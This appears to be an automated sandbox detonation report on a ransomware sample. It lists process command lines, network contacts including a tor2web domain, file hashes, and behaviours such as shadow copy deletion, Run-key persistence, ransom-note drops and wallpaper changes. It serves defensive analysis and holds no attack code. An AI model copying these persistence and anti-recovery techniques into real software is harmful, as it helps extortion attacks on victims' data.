"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab87c3cb8,0x7ffab87c3cc8,0x7ffab87c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 7tno4hib47vlep5o.tor2web.org | udp |
| AU | 103.198.0.111:443 | 7tno4hib47vlep5o.tor2web.org | tcp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.242.140.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| AU | 103.198.0.111:443 | 7tno4hib47vlep5o.tor2web.org | tcp |
| N/A | 52.111.227.14:443 | tcp |
Files
C:\Users\Admin\AppData\Roaming\ysljjud.exe
| MD5 | 209a288c68207d57e0ce6e60ebf60729 |
| SHA1 | e654d39cd13414b5151e8cf0d8f5b166dddd45cb |
| SHA256 | 3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370 |
| SHA512 | ce4a7e42738154183fc53702f0841dfd4ad1eb0567b13cc1ff0909f1d330e9cd2fb994375efc6f02e7eddaaae1f465ff93458412143266afdaff1c6bf6477fc3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 7bed1eca5620a49f52232fd55246d09a |
| SHA1 | e429d9d401099a1917a6fb31ab2cf65fcee22030 |
| SHA256 | 49c484f08c5e22ee6bec6d23681b26b0426ee37b54020f823a2908ab7d0d805e |
| SHA512 | afc8f0b5b95d593f863ad32186d1af4ca333710bcfba86416800e79528616e7b15f8813a20c2cfa9d13688c151bf8c85db454a9eb5c956d6e49db84b4b222ee8 |
\??\pipe\LOCAL\crashpad_4688_PASGRGAINHOKCQXV
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5431d6602455a6db6e087223dd47f600 |
| SHA1 | 27255756dfecd4e0afe4f1185e7708a3d07dea6e |
| SHA256 | 7502d9453168c86631fb40ec90567bf80404615d387afc7ec2beb7a075bcc763 |
| SHA512 | 868f6dcf32ef80459f3ea122b0d2c79191193b5885c86934a97bfec7e64250e10c23e4d00f34c6c2387a04a15f3f266af96e571bbe37077fb374d6d30f35b829 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 324d3a5e9b6ca20f0d648da739cac6dd |
| SHA1 | a220328f6c759922b327de62495422cb230112e7 |
| SHA256 | 41bd5a57fb310879724daa61b0ccbb7fbbbf1123f35e67b9a4018c6539b64070 |
| SHA512 | 53d6cc8a22589ddf65a09516541801a2263bba7c5127024e3d12d32ef0f35cfcd3399e238c262c39a44a678dd202343b6942932099d9957c97d0bc606d7cc1ac |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6a0e555f481402da2ea170967e86dedb |
| SHA1 | 354450cde633e8ced8f2c24ee0a20f8e2c498164 |
| SHA256 | 5afe4da6cb737b8b801808ad1db07b954d7b14a4e6704e9907a368b73ce31586 |
| SHA512 | 85ce75a7474c8139f42381192a2f32d7ca1d5dc3a30a1e4d26a79b5f934048a5f4ec912d0b3b0ba8775453cb198a30d7680643ad1bce8d20c6a8ace69e3d8d2e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1a2e3e0c08197b14173ed434408cac25 |
| SHA1 | 2bcd0fea7ff30a47d90b98d52bc2d88d56033e2d |
| SHA256 | 9d4dee4f2db8e5f1fd656edf4cfe1ff9d924b5c338ef215df661600dd90d4ec6 |
| SHA512 | 9c2dbe33808cf54e0c5c3a231842497d8545ff1925906a524d1101dcce7b6541388d40cbcea4325f7ef01aba2eeea01b3b8d3240af737015eee016bd59bc3ccb |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | d98c17cfbf569ddbced6c9f7d0c6c934 |
| SHA1 | 0894197ca41a71fa1802965cfb6135088a22e878 |
| SHA256 | 0b95871daa7a4f6501ab6898e35344bba32bc54596578ca83b988ed90db12d71 |
| SHA512 | 4a9d307eccd6d9cdfa29c792237e9e399692f44bd2782f95b5d7eb020516dbe92337725bca070f65c905a5ccb9ba2baa29d332cada6e60a55b29ee283a70e6ce |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | f5b185e17f68b1548785e3eaa701ba2c |
| SHA1 | d9488a71ea2d313e24566ec6124c52d4c30d70dd |
| SHA256 | 9935cb1963a5176d565de059566170d98c3d0d60bbf7f26d0e31e30fea83376e |
| SHA512 | 21657feafe384ce18105dbb896a11fe0aba528f351fbaee98c7ec3b037d739e66bc214f04e15b26dff799baa1231065147d71ba20e4162a0a9c990a061cee99a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 505608fd610f0056ca3303029e539bc5 |
| SHA1 | 77f197f20fb48915b6d512ffd70acf199ca8ca19 |
| SHA256 | a72aba95d99e0d776360dffd6049dddf16b70cdd99cf630549c02b29b374e500 |
| SHA512 | c06e568877aaddfd371a5549284dc9cdd285fe5016e26a64bd94752cdfe482f70af5e8a9411f9cb7741d86f2efab3e87c25946a6f0c93ffeff8c71bd49ed97cc |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win7-20240903-en
Max time kernel
98s
Max time network
96s
Command Line
Signatures
Deletes shadow copies
Renames multiple (374) files with added filename extension
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\msconfig = "C:\\Users\\Admin\\AppData\\Roaming\\qrsjojt.exe" | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
Indicator Removal: File Deletion
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HELP_RESTORE_FILES.bmp" | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2948 set thread context of 2340 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
| PID 1936 set thread context of 2444 | N/A | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | C:\Users\Admin\AppData\Roaming\qrsjojt.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\VideoLAN\VLC\locale\fi\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\zh_TW\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Media Player\ja-JP\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\mai\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Media Player\en-US\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\es-ES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nn.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-backglow.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\stream_out\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\css\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_left_mousedown.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\icon.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ta\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\hy\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\fr-FR\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\en-GB.pak | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\sw\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Journal\Templates\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mk.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_rest.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\icon.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\MSInfo\ja-JP\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ie\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\is\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT\TableTextService\TableTextServiceSimplifiedShuangPin.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_settings.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\flyout.css | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tk.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bn.pak | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\ja-JP\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Subpicture1.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Etc\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_drop_shadow.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\css\settings.css | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\cs.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Common Files\System\msadc\fr-FR\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\vignettemask25.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-over-select.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\video_filter\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\month.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pa-in.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4AE715C1-A24B-11EF-82CE-E62D5E492327} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437724841" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 802835115836db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
